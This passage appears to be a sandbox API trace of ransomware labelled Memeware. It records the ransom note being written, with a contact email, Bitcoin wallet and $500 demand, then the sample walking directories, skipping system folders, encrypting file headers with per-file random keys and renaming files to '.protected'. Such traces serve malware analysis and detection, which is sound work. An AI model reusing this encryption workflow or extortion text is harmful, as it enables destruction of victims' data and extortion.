was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.747] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0044.748] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.748] WriteFile (in: hFile=0xa0, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0044.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.748] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0044.748] CloseHandle (hObject=0xa0) returned 1 [0044.748] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files (x86)") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="$Recycle.bin") returned 1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="System Volume Information") returned -1 [0044.748] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0044.748] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0044.748] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0044.748] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0044.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0xffffffff [0044.749] FindNextFileW (in: hFindFile=0x4472f8, 
lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files (x86)") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$Recycle.bin") returned 1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="System Volume Information") returned -1 [0044.749] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0044.749] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".protected") returned 0x0 [0044.749] lstrcmpW (lpString1="hiberfil.sys", lpString2="RESTORE_FILES.txt") returned -1 [0044.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.749] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.749] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Windows") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Program Files") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Program Files (x86)") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="$Recycle.bin") returned 1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="System Volume Information") returned -1 [0044.750] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0044.750] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0044.750] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0044.750] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0044.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0044.750] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.750] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.750] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.750] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0044.750] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.750] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.750] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.751] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\." 
(normalized: "c:\\msocache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.751] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.751] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.751] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.751] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0044.751] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.751] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.751] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.751] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.751] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.751] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Program Files") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="Program Files (x86)") returned -1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="$Recycle.bin") returned 1 [0044.751] lstrcmpiW (lpString1="All Users", lpString2="System Volume Information") returned -1 [0044.751] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0044.751] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0044.751] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0044.752] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\*") returned 27 [0044.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.886] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\.") returned 27 [0044.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.886] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.886] lstrcmpW 
(lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.886] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\." (normalized: "c:\\msocache\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.886] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0045.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0045.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0045.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\..") returned 28 [0045.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0045.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.018] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0045.018] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0045.018] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0045.018] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0045.018] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\.." 
(normalized: "c:\\msocache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.018] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0045.018] lstrcmpiW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0045.018] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C") returned 66 [0045.018] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0045.018] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0045.019] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*") returned 68 [0045.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0045.025] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0045.025] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0045.025] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0045.025] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.") returned 68 [0045.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.025] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0045.025] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0045.025] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.025] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.025] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.025] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0045.025] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0045.025] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0045.025] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\..") returned 69 [0045.025] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0045.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.025] StrStrIW (lpFirst="..", 
lpSrch=".protected") returned 0x0 [0045.025] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0045.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.026] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.026] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Windows") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Program Files") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="Program Files (x86)") returned -1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="$Recycle.bin") returned 1 [0045.026] lstrcmpiW (lpString1="ExcelLR.cab", lpString2="System Volume Information") returned -1 [0045.026] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.026] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".protected") returned 0x0 [0045.026] lstrcmpW (lpString1="ExcelLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0045.026] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0045.026] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0045.026] 
CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".txt") returned 0x0 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".rar") returned 0x0 [0045.029] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 78 [0045.029] StrStrW (lpFirst="ExcelLR.cab", lpSrch=".zip") returned 0x0 [0045.029] ReadFile (in: hFile=0xb4, lpBuffer=0x48cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48cc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0045.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.143] WriteFile (in: hFile=0xb4, lpBuffer=0x48cc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48cc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0045.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.143] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0045.410] 
WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0045.410] CloseHandle (hObject=0xb4) returned 1 [0046.421] wnsprintfW (in: pszDest=0x495c60, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.protected") returned 88 [0046.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.protected")) returned 1 [0047.306] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Windows") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Program Files") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="Program Files (x86)") returned -1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="$Recycle.bin") returned 1 [0047.306] lstrcmpiW (lpString1="ExcelMUI.msi", lpString2="System Volume Information") returned -1 [0047.306] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".protected") returned 0x0 [0047.306] lstrcmpW (lpString1="ExcelMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0047.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0047.306] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0047.306] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".txt") returned 0x0 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".rar") returned 0x0 [0047.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 79 [0047.306] StrStrW (lpFirst="ExcelMUI.msi", lpSrch=".zip") returned 0x0 [0047.307] ReadFile (in: hFile=0xb4, lpBuffer=0x4a8878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a8878*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0047.479] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.479] WriteFile (in: hFile=0xb4, lpBuffer=0x4a8878*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a8878*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0047.480] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.480] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, 
